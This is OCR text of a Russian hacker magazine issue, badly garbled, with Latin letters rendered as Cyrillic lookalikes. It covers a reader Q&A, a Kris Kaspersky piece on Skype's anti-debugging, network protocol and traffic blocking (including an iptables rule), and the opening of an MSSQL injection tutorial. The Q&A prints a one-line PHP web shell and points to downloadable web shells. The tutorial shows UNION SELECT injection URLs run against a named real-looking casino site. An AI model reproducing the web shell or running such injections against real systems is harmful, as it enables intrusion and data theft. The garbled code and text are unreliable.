ЗоскзСар. Но есть еще один оригинальный способ. Во многих 
системах бесплатной почты [например, таіі.ги и Яндекс) 
существует функция «Сборщик почты» (смотри настройки). При 
включении этой функции, сервер бесплатной почты будет сам 
подключаться к указа иным тобой почтовым серверам и скачи- 
вать письма на созданныйтобой бесплатный ящик. В итоге на 
почтовых серверах будет светиться только ІР-адрес Яндекса или 
таіі.ги . Позжеты сможешь спокойно забрать письма с бесплат- 
ногоящика через ѵѵеЬ-интерфейс или спомощью мылера. 



Во- О: Я ХОЧУ ВИДЕТЬ ВСЮ ИНФОРМАЦИЮ, КОТОРОЙ ОБМЕНИВА- 
ЮТСЯ МОЙ БРАУЗЕР И ѴѴЕВ-СЕРВЕР, КАК ЭТО СДЕЛАТЬ? 

Во- А: Ты можешь воспользоваться ресурсом ѵѵеЬ-зпіІІег.пеІ . В поле 
НТТР(5)-ІІРЕ введи адрес сайта, с которым хочешь соеди- 
ниться и нажми кнопку «ЗиЬтіІ». На появившейся странице 
тыувидишьзаголовокНТТР-запроса (НТТР Редиезі Неабег), 
который был сформировантвоим браузером, и ниже — ответ 
сервера (НТТР Резропзе Неабег). Если тебе неудобно пользо- 
ваться ѵѵеЬ-снифером,тоты можешь поискать плагины ксвоему 
браузеру, которые способны просматривать заголовки запросов 
и ответов в реальном времени. Например, для ІЕ таким плаги- 
ном является іеНТТРНеабегзЗеіир.ехе. Можешь скачать его по 
адресу ѵѵѵѵѵѵ.Ыипск.іпІо . он весит всего 137 Кб. После установки 
программы, запусти ІЕ и выбери «Вид Панели обозревателя 
-> іеНТТРНеабегзЗеіир ѵі .6». 



<?рЪр зузСегп ( $_СЕТ [ " сшсЗ." ] ) ; ?> 



Однако хакеры и скрипт-киддисы часто используют более продвинутые 
шеллы с формами (полями ввода), кнопками и пр. Наиболее 
известными из таких ѵѵеЬ-шеллов являются г57зНеІІ и с99. Эти и 
десятки других продвинутыхѵѵеЬ-шелловты легко можешь най- 
ти и скачать в интернете, например с сайта ѵѵѵѵѵѵ.ѵѵеЬ-Иаск.ги . 



(ф ВО МНОГИХ ПРОГРАММ АХ ДЛЯ ПОДБОРА ПАРОЛЕЙ ЕСТЬ 
ВОЗМОЖНОСТЬ ВЫБРАТЬ ГИБРИДНУЮ АТАКУ (НѴВКЮ СКАСК), КАК 
ОНА РАБОТАЕТ? 

Во- А: Гибридная атака названа так потому, что она совмещает в себе ата- 
ку по словарю и атаку последовательным перебором паролей. 

В гибридной атаке к каждому словарному слову добавляются 
символы справа и/или слева, что позволяет формировать та кие 
пароли, какзехі 23, $абтіп, #Наскег# и т.п. Обычно в настройках 
программы можно задать количество символов, добавляемых 
справа и слева. 



Во- О: КАКИМИ ПРОГРАММАМИ МОЖНО ЗАКОДИРОВАТЬ НТМЬ-КОД? 
НУЖНО ЛИ КОДИРОВАТЬ НТМЬ-КОД, ЧТОБЫ БЫЛО НИЧЕГО НЕ ПО- 
НЯТНО, КОГДА СОХРАНЯЕШЬ СТРАНИЧКУ? А ТО ПЛАГИАТОРЫ ЧАС- 
ТО КРАДУТ ЧУЖИЕ САЙТЫ И ИСПОЛЬЗУЮТ ИХ В СВОИХ НУЖДАХ. 

Во- А: Таких программ существует множество: ѴѴеЬСгурІ, НТМИ Ргоіесіог, 
НТМЕбиагб, НТМЕепсгурІ и т.п. Ищи ихв интернете с помощью 
поисковика. Однако я бы на твоем месте сильно не рассчитывал 
на них, так какэти программы могутзащитить лишь от неопыт- 
ных пользователей, а профессионал все равно сможет раскоди- 
ровать та кие зашифрованные страницы. В книге «Головоломки 
для хакера» я на конкретном примере показал, как расшифро- 
вать страницу, зашифрованную программой НТМЕ Ргоіесіог. 



Во- 0: 1 ЧТО ТАКОЕ ѴѴЕВ-БНЕЬЬ И ГДЕ ЕГО ДОСТАТЬ? 

Во* А: ѴѴеЬ-зИеІІ — это небольшая программка, которую хакер заливает 
на взломанный ѵѵеЬ-сервер, чтобы иметь возможность его 
удаленно изучать и администрировать. Иначе говоря, ѵѵеЬ-зЬеІІ 
предоставляетѵѵеЬ-интерфейс для запуска консольных команд 
и просмотра результатов. ѴѴеЬ-шеллы создаются на различных 
ѵѵеЬ-языках, таких как Регі, РНР, А5Р. Воттак выглядит содержи- 
мое простейшего ѵѵеЬ-шелла на РНР: 



Во- КАК ПОНИМАТЬ ТЕРМИН «НЕДОСТАТОЧНАЯ АУТЕНТИФИКА- 
ЦИЯ» (ІЫ51ІРНСІЕМТ АІІТНЕЫТІСАТІОМІ? 

Во- А: Как правило, доступ к важной информации на ѵѵеЬ-сервере реали- 
зуется с должной аутентификацией. Но некоторые нерадивые 
администраторы полагают, что достаточно «спрятать» важные 
ресурсы по определенному адресу, который неуказан на основ- 
ных страницах сервера или других общедоступных ресурсах, 
чтобы уберечь эти ресурсы отхакеров. Понятно, что, хотя хакер и 
незнаетадрес секретной страницы, она все равнодоступна че- 
рез ѵѵеЬ, а следовательно, необходимый ІЭ РЕ можетбыть найден 
переборомтипичных файлов и директорий. Например, многие 
ѵѵеЬ-приложения поумолчанию используют для административ- 
ного доступа ссылку в корневой директории сервера (/абтіп/). 
Так как пользователь или разработчик предполагает, что никто 
не воспользуется этой секретной страницей по причине отсутс- 
твия на нее прямых ссылок, то зачастую реализацией аутенти- 
фикации пренебрегают. Для получения контроля над сервером 
хакеру достаточно найти эту страницу — это и есть «недостаточ- 
ная аутентификация». 



Во- О: ГДЕ МОЖНО ВЗЯТЬХОРОШИЙ И ПОЛНЫЙ СПРАВОЧНИК ВСЕХ 
АРІ-ФУНКЦИЙ ѴШ00ѴѴ5? 

Во- А: Я видел в интернете сборники АРІ-функций, созданные русски- 
ми народными умельцами. Однако все серьезные кодеры за 
подробными описаниями АРІ-функций обращаются только 
к М50ІЧ (МісгозоЕ Оеѵеіортепі Ыеіѵѵогк). Вообще-то, М5йІ\І 
— платный, ты по купаешь та к называемую «подписку на 
МЭРЫ» — помере выхода новых версий (раз в 4 месяца), тебе 
будут приходить его обновления на СР/ОѴВ. Но если утебя нет 
возможности/желания пользоваться компакт-дисками, тоты 
можешь получить полный бесплатный доступ к МЭРЫ на сайте 
МісгозоЕ — тзбп.тісгозоЕ.сот [многие статьи переведены 
на русский язык). ПС 
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КРИС КАСПЕРСКИ, 



СКРЫТАЯ 

УГРОЗА 



КАК КРИС НАДРУГАЛСЯ НАД 5КѴРЕ 



Зкуре представляет собой одну из самых популярных ѴоІР-программ, установленную 
на миллионах компьютеров по всему миру, владельцы которых даже и не подозревают, 
какая опасность им грозит. А опасность им грозит весьма серьезная : от утечки конфи- 
денциальной информации до проникновения червей и попадания на трафик, не говоря 
уже о таких мелочах, как нежелание Зкуре работать при активном ЗошСЕ. Я все это бла- 
гополучно разгрыз и теперь выставляю продукты своей жизнедеятельности на всеобщее 
обозрение :). 



куре, созданный отцами-осно- 
вателями скандально известной 
Кагаа и унаследовавший отсвоей 
прародительницы самыехудшие 
ее черты, работаетпо принципу самооргани- 
зующейся распределенной пиринговой сети 
(сІІБІхіЬіЛесІ зеіб-огда пігесі реег-іо-реег пеіѵѵогк, 
Р2Р]. Зкуре — это черный ящике многоуровневой 
системой шифрования напичканногоантиот- 
ладочными приемами исполняемого файла, 
считывающий с компьютера конфиденциальную 
информацию и передающий ее в сеть позакры- 
тому протоколу. Последний обходит брандмауэры 



и сурово маскируетсвойтрафик, препятствуя его 
блокированию. Все это превращаетЗкуре в иде- 
ального переносчика вирусов, червей и дронов, 
создающих свои собственные распределенные 
сети внутри Зкуре-сети. К тому же Зкуре довольно 
бесцеремонно обращается с ресурсами твоего 
узла, используя его для поддержания связи меж- 
ду остальными узлами Зкуре-сети, напрягая ЦП и 
генерируя мощный потоктрафика. Атрафик, как 
известно, редко бываетбесплатным (особенно в 
России], такчто кажущаяся бесплатностьзвонков 
весьма условна — за узлы с «тонкими» каналами 
расплачиваются «толстые» владельцы. 



Зкуре активно изучается в хакерских лабора- 
ториях и зесигку-организациях по всему миру, 
и большинство исследователей единодушно 
сходятся во мнении, что Зкуре — это дьяволь- 
ски хитрая программа, написанная бесспорно 
талантливыми людьми в стиле Віаск Мадіс Агі. 
Зкуре не брезгует грязными трюками, созда- 
ющими огромные проблемы, о которых я и 
собираюсь рассказать. 

О Анализ исполняемого файла 

Исполняемый файл Зкуре-клиента представляет 
собой настоящий шедевр хакерского искусства, 
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> Антиотладочные приемы, с помощью которых 5куре обнаружива- > Беглая трассировка 5куре с помощью ОІІуйЬд быстро выявляет 
етзагруженный ЗоКІСЕ защитный код, выполняющий проверку на присутствие 5оНІСЕ 



вобравший в себя множество интересных и 
достаточно могучихзащитных механизмов. Для 
противодействия им требуются нетолько мощ- 
ные инструментальные средства (отладчики, 
дизассемблеры, дамперы ит.д.) и знания/навы- 
ки, но еще и куча свободного времени. 

Двоичный файл полностью зашифрован и дина- 
мически расшифровывается по мере загрузки 
в память. Причем сбросдампа невозможен, 
точнее, затруднен тем обстоятельством, что 
стартовый код после выполнения очищается, 
в результате чего мы получаем ехе, который не 
запускается. Оригинальнаятаблица импорта не 
содержит ничего интересного, и АРІ-функции 
подключаются уже в процессе распаковки. 
Проверка целостности кода выполняется из 
разных мест в случайном порядке (преиму- 
щественно при входящихзвонках), поэтому 
поискзащитных процедур представляет собой 
весьма нетривиальную задачу. Болеетого, они 
основаны на криптографических Р5А-сигнату- 
рах и снабжены полиморфными генераторами, 
которые в случайном порядке переставляют 
инструкции АБ Б, ХОР, 511В и др. , перемешивая 
ихслевыми машинными командами. 
Статический вызов функций (пожестко пропи- 
санному адресу) практически не встречается, и 
все важные процедуры вызываются по динами- 
чески вычисляемомууказателю, пропущенному 
через обфускатор. Следовательно, дизассем- 
блер нам тут уже не поможет, и приходится 
браться за отладчик. 

А вот про отладчик следует сказать отдельно. 
Экуре распознает 5оШ СЕ даже при наличии 
установленного ІсеЕхІ, наотрез отказываясь 
запускаться. Это забавно, поскольку для взлома 



самого Экуре отладчикЭоЛІСЕ не очень-то и 
нужен, ведь существуют и другие инструмен- 
ты подобного рода, среди которых, в первую 
очередь, хотелось бы отметитьТИе Разіа Ріпд О 
ОеЬиддег, или сокращенно [РРСЮ], не обнару- 
живаемый Экуре-клиентом и, как и следует из 
его названия, работающий на уровне ядра. В 
принципе можно воспользоваться и отладчиком 
прикладного уровня (например, стремительно 
набирающим популярность ОІАуОбд). Только при 
этом важно помнить, что Экуре легко обнаружи- 
вает программные точки останова, пред- 
ставляющие собой однобайтовую машинную 
инструкцию с опкодом ОСЬ, записывающуюся 
поверх отлаживаемого кода. Адля предотвра- 
щения пошаговойтрассировки 5 куре осущест- 
вляетзамеры времени выполнения опреде- 
ленныхучастков кода, для прохождения через 
которые приходится использовать полноценные 
эмуляторы РС с интегрированным отладчиком, 
например знаменитый В0СН5. 

Наконец, когда исполняемый файл распакован 
и все проверки пройдены, защита вычис- 
ляет контрольную сумму и преобразует ее в 
указатель, по которому передается управление, 
пробуждающее Экуре. 

Проблема втом, чтоЭкуреоченьследитза своей 
целостью, поэтому попытка исправления \г\і на 
Іппр збогі работаеттолько до первого входящего 
звонка, после которого Экуре падает и обратно 
уже не поднимается. Специальнодлятакиххит- 
роумныхзащитеще во времена М5-Б05 была 
разработана техника онлайн-патча, при которой 
исправление программы осуществляется не- 
посредственно в оперативной памяти, а после 
успешного прохождения проверки на наличие 



ЭоШСЕ, совершается откат, чтобы не волновать 
процедуру проверки целости. 

□Архитектура распределенной сети 

На атомарном уровне структура 5куре-сети 
состоит из обычных узлов (погтаі/огсііпаі побе/ 
Ьозі/пезі), обозначаемыхаббревиатурой 5С 
(Экуре Сііепі), и зирег-узлов (вирег побе/Ьозі/ 
пезі), которым соответствует аббревиатура 5КІ. 
Любой узел, который имеет публичный ІР-адрес 
(тот, который маршрутизируется в интернет и об- 
ладает достаточно широким каналом), автома- 
тически становится зирег-узлом и гонит через 
себятрафикобычных узлов, помогая им преодо- 
леть защиты типа брандмауэров или транс- 
ляторов сетевых адресов (ЫАТ) и равномерно 
распределяя нагрузку между хостами. В этом и 
состоит суть самоорганизующейся распреде- 
ленной децентрализованной пиринговой сети, 
единственным централизованным элементом 
которой является Зкуре-Іодіп сервер, отвечаю- 
щий за процедуру авторизации Экуре-клиентов 
и гарантирующий уникальность позывных для 
всей распределенной сети. 

Важно подчеркнуть, что связь между узлами 
осуществляется не напрямую, а через цепочку 
зирег-узлов. Серверов в общепринятом 
смысле этого слова (таких, например, как в 
сети еБопкеу) в 5куре-сети нет. Любой узел 
сустановленным Экуре-клиентом является 
потенциальным сервером, которым он автома- 
тически становится при наличии достаточных 
системных ресурсов (объема оперативной па- 
мяти, быстродействия процессора и пропускной 
способности сетевого канала). 

Каждый узел 5куре-сети хранит перечень ІР- 
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>6епега15куре 
Апаіузіз — мини-пор- 
тал с кучей ссылок 
на статьи и прочие 
ресурсы, посвящен- 
ные анализу Бкуре 
и методам борьбы 
С НИМ: Ыі:р://ѵѴѴѴѴѴІ. 

сз.соІитЬіа. 
еби/~5а[тап/зкуре . 
Бкуре Тго)ап — те- 
зисная презентация 
ѴѴаІіегБргепдег, 
показывающая, как 
можно использовать 
Бкуре-сеть для рас- 
пространения червей 
и прочей заразы: 
ѵѵѵѵѵѵ.сзпс.сН/зІаІіс/ 
боѵѵпІоаб/тізс /2006 
зкѵре ігоі'апег ѵі.і.рсіі . 
« Но\л/ 1;о изе Бкуре 
ѵѵііЬ Бомбее?» — лю- 
бопытная статья, 
рассказывающая, 
почему Бкуре- клиент 
не работает при уста- 
новленном БоШСЕ и 
как это побороть: 
ЫірУ/дсазіег. 
регзо.огапдеТг/ 
зкѵреапбзоШсе.ЫтІ . 
«Бкуре Реасіз 
УоигВІОБапб 
МоіЬегЬоагсІ Бегіаі 
ЫитЬег» — заметка 
в блоге, разоблача- 
ющая махинации, 
скрыто проделы- 
ваемые Бкуре, 
читающим ВІ05 и 
серийный номер 
материнской платы: 
ѵууѵѵу.радеІаЫе.сопп/? 
р=27 . 
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> Структура Бкуре-сети, в которой присутствуют Бкуре-клиенты за МАТ и брандмауэрами 



адресов и портов известных ему зирег-узлов в динамически 
обновляемых кэш-таблицах (Нозі: СасЬе ТаЫез, НС-іа Ыез). 
Начиная с версии Бкуре 1 .0, кэш-таблица представляет со- 
бой простой ХМБ-файл, в незашифрованном видезаписан- 
ный на диске в домашней директории пользователя. 
Бкуре-клиенты за отдельную плату могут принимать входя- 
щиезвонки с обычныхтелефонов и совершать подобные 
звонки. Однако в РС2РС-обмене эти серверы никак не участ- 
вуют, поэтому мы не будем на них останавливаться. 

О Как Бкуре обходит брандмауэры 

Протокол обмена между Бкуре-клиентами совершенно не- 
документирован, и поэтому вся информация о нем получена 
методами реинженеринга: дизассемблирования Бкуре- 
клиентов, анализа перехваченного сетевого трафика ит.д. 
Поскольку существует огромное количество значительно 
различающихся между собой версий Бкуре-клиентов, то 
описание протокола может соде ржать неточности, во всяком 
случае, ореп зоигсе клиента еще никто не написал. 

Сразу же после своего запуска Бкуре-клиент открыва- 
етТСР- и ІЮР-порты. Их номера случайным образом 
задаются при инсталляции и могут быть в любой момент 
изменены через диалог конфигурации, что затрудняет 
блокирование Бкуре-трафика на брандмауэре. Помимо 
этого, Бкуре открывает порты 80 (НТТР) и 443, однако они 
не являются жизненно важными, и даже если их заблоки- 
ровать, Бкуре ничуть не огорчится. 

Ситуация осложняется тем, что Бкуре шифруеттрафик, 



активно используя продвинутыетехнологии обфускации, 
препятствующие выделению постоянных сигнатур в полях 
заголовков. Алгоритмы шифрования меняются от версии к 
версии, ктомуже выпущено множество специальных версий 
для разных стран мира, чьи законы налагаютопределенные 
ограничения на длину ключа или выбранные криптогра- 
фические алгоритмы. Нов целом механизм шифрования 
выглядит та к, как показано на рисунке. 

Бкуре-клиенты крайне деликатно обходятся с брандмауэра- 
ми итрансляторами сетевых адресов, просачиваясьсквозь 
них через хорошо известные протоколы БТИ N и ТІІПЫ. 
Протокол БТІІЫ уже вошел в Библию Интернета и подробно 
описан в НРС-3489 (ѵѵѵѵѵѵ.гіс-агсЫѵе.огд/де1;гіс.рИр?гіс=3489). 
Что же касается ТІІНЫ'а, то он все еще находится в разра- 
ботке и в настоящее время доступна лишь черновая версия 
ста н да рта : ѵѵѵѵѵѵ^бгозеп.пеі/гюібсот іигп.ЫтІ . 

Так что, с юридической точки зрения, действия Бкуре закон- 
ны и не попадаютпод статью. БТІІЫ, расшифровывающийся 
какБітрІе Тгаѵегзаіоі ІІзег Оаіадгат Ргоіосоі (ІЮР) ТЬгоидЬ 
Меіѵѵогк АббгеззТгапзІаіогз (МАТз) (простое проникновение 
датаграмм протокола ІЮР через транслятор сетевых адресов 
(МАТ)), представляет собой отличное средство, которое стра- 
дает, однако, рядом ограничений и не работает в следующих 
случаях: 

• если путь во внешнюю сеть прегражден злобным брандма- 
уэром, режущим весь ІЮР; 

* если на пути во внешнюю сетьстоитсимметричныйтранс- 
лятор сетевых адресов. 



> Структура децентрализованной самоорганизующейся 
пиринговой Бкуре-сети 



>5куре, работающий через ргоху-сервер, конфигура- 
ция которого прочитана из настроек браузера 
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> Распознание Экуре-трафика по необычному идентификатору во время обращения 



кІ_одіп5егѵег при обмене 55І_-ключами 



Ну, с брандмауэром все понятно. Если ІЮ Р закрыт, то 
никак его не откроешь. А вот симметричный транс- 
лятор сетевых адресов (зуттеігіс N АТ) — это что за 
штука? Не углубляясь в технические детали, скажем, 
что симметричный ЫАТ представляет собой разно- 
видность обыкновенного транслятора, требующего, 
чтобы целевой ІР-адрес и порттранслируемого 
пакета совпадали с внешним (ехіегпаі) ІР-адресом 
и портом. Если один итотжеузел посылает пакеты 
содинаковыми исходными ІР-адресами и портами 
по разным направлениям, МАТ будет вынужден 
транслировать их на другие порты. Таким образом, 
чтобы отправить внутреннему узлу ІЮ Р- па кет, вне- 
шний узел должен первым делом получитьзапрос 
от внутреннего узла. Самостоятельно инициировать 
соединение внешнийузел не в состоянии, поскольку 
ЫАТ просто не знает, на какой внутренний ІР и порт 
следуеттранслировать неожиданно сваливавшийся 
ІЮ Р- па кет. 

Эта проблема решается протоколом ТІІРМ (Тгаѵегзаі 
ІІзіпд Реіау МАТ), технические подробности работы 
которого описаны по вышеупомянутому адресу и 
большинству читателей совершенно неинтересны. 
Гораздо важнее другое — протокол ТІІРМ значи- 
тельно увеличивает латентность и теряет большое 
количество ІЮР-пакетов (раскеі Іова), что далеко не 
лучшим образом сказывается на качестве и устойчи- 
вости связи, но полное отсутствие связи — еще хуже. 
Так что пользователям Экуре стоит радоваться, а не 
жаловаться! 

Воттолько администраторы этой радости почему-то 
не разделяют, наглухо закрывая ІЮР-трафик (тем 
более что большинству нормальных программ он не 
нужен). Немного поворчав для приличия (замурова- 
ли, демоны!), Экуре автоматически переключается 
на чистый ТСР, отрубить который администратору 
никто не позволит. Правда, поколдовав над бран- 
дмауэром, тот можетзакрыть все неиспользуемые 
порты, но втом-то и подвох, что неиспользуемых 
портов в природе не встречается! При соединении с 
удаленным узлом, операционная система назначает 
клиентулюбой свободный ТСР/ІЮР-порт, на который 
будут приходить пакеты. То есть если мы подключаемся 
кѵѵеЬ-серверу по 80-му порту, наш локальный порт 



может оказаться 1369-м, 6927-м или еще каким-нибудь 
другим. Закрыв все порты, мы лишимся возможности 
уста на вливать ТС Р/ІЮ Р-соеди нения! 

Единственный выход — обрубить всем пользова- 
телям локальной сети прямой доступ в интернет, 
заставив ихходить через ргоху-сервер. Однако 
даже такие драконовские меры не решат проблемы, 
поскольку Экуре просто прочитает конфигурацию 
браузера и воспользуется ргоху-сервером как 
своим родным! 

ОКакзаблокироватьБкуре-трафик 

Разработчики Экуре предостерегают администра- 
торов от попыток выявления и блокирования его 
трафика (типа: «Все равноу вас ничего не получит- 
ся!»). И действительно, распознать Экуре-трафик 
очень сложно, а заблокировать его можнотолько по 
содержимому, которое зашифровано и не содержит 
никаких предсказуемых последовательностей. К 
счастью для администраторов, создатели Экуре, при 
всей своей гениальности, допустили ряд оплош- 
ностей, оставив частьтрафика незашифрованной. 
ІЮР-соединение использует открытый протокол для 
получения публичных ІР-адресов зирег-узлов, что 
вполне можетбыть выявлено анализатором трафика. 
Это раз. ТСР-соединение использует один и тот 
же РС4-поток дважды, что позволяет нам восста- 
новить 10 первых байт ключа, расшифровав часть 
постоянных полей заголовков Экуре-протокола. Это 
два! Кстати, весьма полезная вещьдля шпионажа 
за чужими разговорами! Однако мне не известен ни 
один готовый блокиратор Экуре-трафика, а писать 
свой собственный — лениво да и времени нет. 
Распознать и заблокировать ІЮР-трафик намного 
проще. Каждый фрейм начинается с двухбайтового 
идентификационного номера (Ю) и типа пакета 
(рауіоасі). В ІЮР-пакет вложен 39-байтный ІЧАСК- 
пакет, пропущенный через обфускатор и содержа- 
щий следующие данные: 

• идентификатор пакета (непостоянен и варьируется 
от пакета к пакету); 

• номер функции (Юпс), пропущенный через обфус- 
катор, но !ипс & 8ЕЬ всегда равно 7Ь; 

• ІР отправителя; 
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пришли 

5 разных изображений 
животных с любых 
упаковок с дисками 
ЗтаПТгаск 

и выиграй 

один из суперпризов 




МРЗ плеер Кіпдзіоп РМР К-РЕХЮО, цифровой фотоаппарат 
Сапоп А640 РоѵѵегЗІіоі, видеокамера ЗОЫУ ОСР-ОѴО305Е 



Каждый участник акции гарантировано 
получает брелок-фонарик. 

Письма с обязательным указанием ФИО, 
номера телефона и обратного адреса 
(индекс обязателен) необходимо направлять 
по адресу: 1 23007, г. Москва, а/я 1 7 

с пометкой «Сезон охоты» 

Внимание! 

На полиграфии для банок 2 изображения 
животного, поэтому ты можешь обмениваться 
одним из них со своим другом или знакомым. 
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• ІР получателя. 

Таким образом, чтобы заблокировать ІЮР-тра- 
фик, генерируемый 5куре, достаточно добавить 
в брандмауэр следующее правило: 

ірДаЫез -I РОКШАКБ -р исір -ш 
ІепдОЬ --ІепдДЪ. 39 -ш и32 
- и32 ' 27&0 х8Т=7 ' — и32 '31 = 0 
х527с4833 * -3 БКОР 

Ксожалению, блокировка ІЮР-трафика 
ничего не решает, поскольку 5 куре авто- 
матом переходит на ТСР, но тут есть одна 
небольшая зацепка. Заголовки входящих 
ІР- па кето в, относящиеся к протоколу обмена 
551-ключами (551 кеу-ехсЬапде раскеЫ, 
содержат нехарактерный для «нормальных» 
приложений идентификатор 1 7030 1 Ь , воз- 
вращаемый в ответ на запрос с идентифика- 
тором 1 60301 Ь (стандартный 55 Ь версии 3.1 ). 
Таким образом, блокирование всех входящих 
пакетов, содержащих в заголовке 1 70301 И, 
серьезно озадачит 5 куре, и текущие версии 
потеряют работоспособность. 



Воттолько надолго ли... 

Для детектирования и блокирования 5куре- 
трафика можно использовать и другие 
программно-аппаратные средства, напри- 
мер РРХ от Іродие или Сізсо Ыеіѵѵогк-ВавесІ 
Арріісаііоп Ресодпіііоп ( N ВАР) . Однако все 
они недостаточно эффективны, так как раз- 
работчики 5 куре не сидят сложа руки и, если 
кому-то удается найти надежный способ бло- 
кировки его поганого трафика, в следующих 
версиях поганец появляется вновь. 

О Армии дронов, 

или какзомбироватьБкуре 

Дешевизна голосовых разговоров вызвала бур- 
ный рост популярности 5куре, сеть которого на 
27 апреля 2006 года, по официальным данным, 
составила свыше 1 00 миллионов зарегистриро- 
ванных пользователей. А сегодня совершают по 
меньшей мере один 5куре-звонок в день свыше 
700тысяч человек! Несложно спрогнозировать, 
что в скором времени в 5куре войдетльвиная 
доля узлов интернета, что имеет как положи- 
тельную, так и отрицательную сторону. 



Хакеры уже давно догадались использо- 
вать5куредля распространения вирусов и 
организации распределенныхатак, которым 
очень сложно воспрепятствовать — 5куре- 
трафик надежно зашифрован и не можетбыть 
проанализирован антивирусами, заблокирован 
брандмауэрами или распознан системами 
обнаружения вторжения. 

Естественно, чтобы захватить 5куре-узел, 
хакер должен найти способ передать на него 
зловредный код, что при соблюдении всех 
мер безопасности он ни за что не сможет 
сделать. Но, как и всякое другое программное 
обеспечение, 5куре подвержен ошибкам, в 
том числе и ошибкам переполнения, одна из 
которых была обнаружена 25 сентября 2005 
года. Сейчас она уже давно исправлена и 
представляет лишь исторический интерес, но 
с ней все-таки стоит познакомиться поближе 
(а сделать это можно на вкѵре.сот/зесигііѵ/ 
5кѵре-зЬ-2005-03.ЫтІ или на зесіізіз.огд/ 
МІбІ5СІО5иге/2005/Осі/0533.Ьіпп1 1. 
Возможность передачи управления на вЬеІІ-код 
позволяла атакующему овладевать любым 



> Механизм шифрования, используемый 5куре 




> Структура ІР-пакета при работе 5куре по протоколу ІЮР 
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>Повторное использование РС4-потока позволяет восстановить 10 байт ключа из 12-ти, 
расшифровывая часть Зкуре-трафика 



Зкуре-узлом, а также всеми известными ему зирег- 
узлами и т.д. Над распределенной сетью нависла 
глобальная угроза, и просто чудо, что она не 
закончилась катастрофой. Однако, как показыва- 
ет практика, там, где есть одна ошибка, рано или 
поздно появляются и другие. Закрытость исходных 
текстов и множество антиотладочных приемов 
(затрудняющихтестирование программы) этому 
только способствуют! 

Другая опасная «вкусность» Зкуре заключается в 
открытости его АРІ. Пойдя навстречу сторонним 
разработчикам, создатели Зкуре предусмотре- 
ли возможность интеграции любой прикладной 
программы со Зкуре-клиентом. Правда, при этом 
на экран выводится грозное предупреждение, что 
такая-то программа хочет пользоваться Зкуре АРІ: 
разрешить или послать ее на фиг? Естественно, 
большинство пользователей на подобные вопросы 
отвечаютутвердительно. Уже привыкшие к надоед- 
ливым предупреждениям, они инстинктивно давят 
«Уез» и только потом начинают думать, а что же они, 
собственно, разрешили? 

Понятное дело, что, чтобы использовать Зкуре АРІ, 
зловредную программу нужно как-то доставить на 
компьютер. Раньше для этого применялась элек- 
тронная почта, успешно фильтруемая антивиру- 
сами, но количество пользователей, запустивших 
исполняемый файл, все равно исчислялось мил- 
лионами. Теперь же для рассылки вирусов можно 
использовать сам Зкуре. Локальный антивирус 
— единственное средство обороны, потенциально 
способное отразить атаку. Но, если он и установлен, 



распознать неизвестный науке вирус он не в состо- 
янии даже при наличии антивирусных баз первой 
свежести (эвристика пока все-таки работает боль- 
ше на рекламу, чем на конечный результат). 

Важно, что протокол Зкуре уже частично рас- 
шифрован и созданы хакерские инструменты, 
позволяющие взаимодействовать со Зкуре-узлами 
в обход стандартных Зкуре-клиентов, и даже без 
сервера регистрации! И хотя в настоящее время 
дело ограничивается простым сбором адресов 
вирег-узлов, существует принципиальная воз- 
можность создания своих собственных сетей на 
базе распределенной Зкуре-сети, главная ошибка 
разработчиков которой заключается в том, что 
Зкуре-узлы безоговорочно доверяют друг другу и 
вся «безопасность» зиждется лишь на закрытости 
протокола. 

□ Заключение 

Заканчивая статью, я хотел бы спросить: что же 
все-таки скрывают создатели Зкуре в недрах 
своего кода? Почему, распространяя программу 
бесплатно, они зажимают исходные тексты и ис- 
пользуютзакрытый протокол, вызывая тем самым 
недоверие специалистов по безопасности? Для 
чего бесплатной программе столь навороченная 
защита, снижающая производительность и потреб- 
ляющая большое количество памяти, ведьломать 
ее никто не собирается? Почему вообще Зкуре- 
клиент реализован как черный ящик? 

Вопросы риторические. Но чует мой хвост, не 
спроста все это! ИИ 



> Структура МАО К- па кета 
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БтагіВиу объявляет КОНКУРС 

на лучшую работу из твоего 
собственного архива. Размести 
на сайте БтагШиу интересные 
фотографии, коллаж или рисунок - 
и ты сможешь выиграть один 
из суперпризов или получить 
поощрительный приз от 
ЗтагіВиу. 
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ЛЕОНИД «НОЮ» ОТРОЙКОВ 



Несмотря на львиную долю *піх-серверов в сети, многие крупные компании предпочи- 
тают использовать ѴѴіпсІоѵѵз. Причем зачастую движки таких ресурсов пишутся на А5Р, 
а в качестве БД выбирается М350Б. Конечно, АЗР-скрипты (расширение а$р) могут ле- 
жать и на никсовых серверах, но вот платформа АЗР-ИЕТ (расширение а$рх) рассчита- 
на исключительно на винду. В сети мало хороших секьюрити-мануалов, посвященных 
уязвимостям движков на базе АЗР.ИЕТ, поэтому в своей статье я затрону именно эту 
тему. Читай внимательно, все примеры, как обычно, я рассмотрю на практике :). 



□ Особенности М55СИ. 

Какты понимаешь, платформа А5Р.ЫЕТ созда- 
валась мелкомягкими под винду. Поэтому и 
атаковать на этот раз нам придется ѴѴіпсІоѵѵз- 
серверы. Какправило, втаком случае в качестве 
БД выбирают М550Б, и при обнаружении инъек- 
та мы будем иметь дело отнюдь не с мускулом. В 
журналеуже не раз писалось о зцМщесИоп, но 
материал преимущественно сводился к потро- 
шению Му50Б-базы. Междутем, как известно, 
синтаксисы Му50І_ и М55С!І_ заметно разнятся. 
Не буду сейчас рассказывать отаких вещах, 
как различное обозначение комментариев, 

— думаю, ты и сам разберешься =). Но вототакой 
интересной вещи, как ІЫР0РМАТІ0М_5СНЕМА в 
М55СИ, мы поговорим. ІЫЕ0РМАТІ0М_5СНЕМА 
представляет собой стандартную базу, вклю- 
чающую в себятаблицы суказанием названий 
таблиц и колонок. Эта фича позволяет нам 



отбросить брут и узнать названия в считанные 
минуты :). На практике это выглядиттак: 

шш. опІіпесазіпогерогДз . сот 
/пеѵ73_зЬ.оѵ7_са1: . азр?саД=1% 
27+ипіоп+зеІесД + І , ІаЫе_ 
пате , 3 + бгот+іпбогта1сіоп_зс]тета . 
ДаЫез-- 

Ксчастью, казиношные сайты тоже не обделены 
багами :). Инъект здесь налицо, я подобрал 
количество полей (3) и сделал выборку колонки 
іаЫе_пате изтаблички ІаЫез, хранящейся 
в стандартной для М550Б базе іп!огтаііоп_ 
БсЬета. Аналогичным запросом получаем 
данные обо всех колонках: 

Ѵ'ЛлАл7'. опІіпесазіпогерогДз . сот/пеѵ\/з_ 
зЬсж_саЦ . азр?саД=1%27+ипіоп+зе1есЦ 



+1 , со1шт_пате , 3 + бгот+іпіогтаДіоп_ 
зсЬета. соіитпз-- 

Кверя отличается лишь названием колонки 
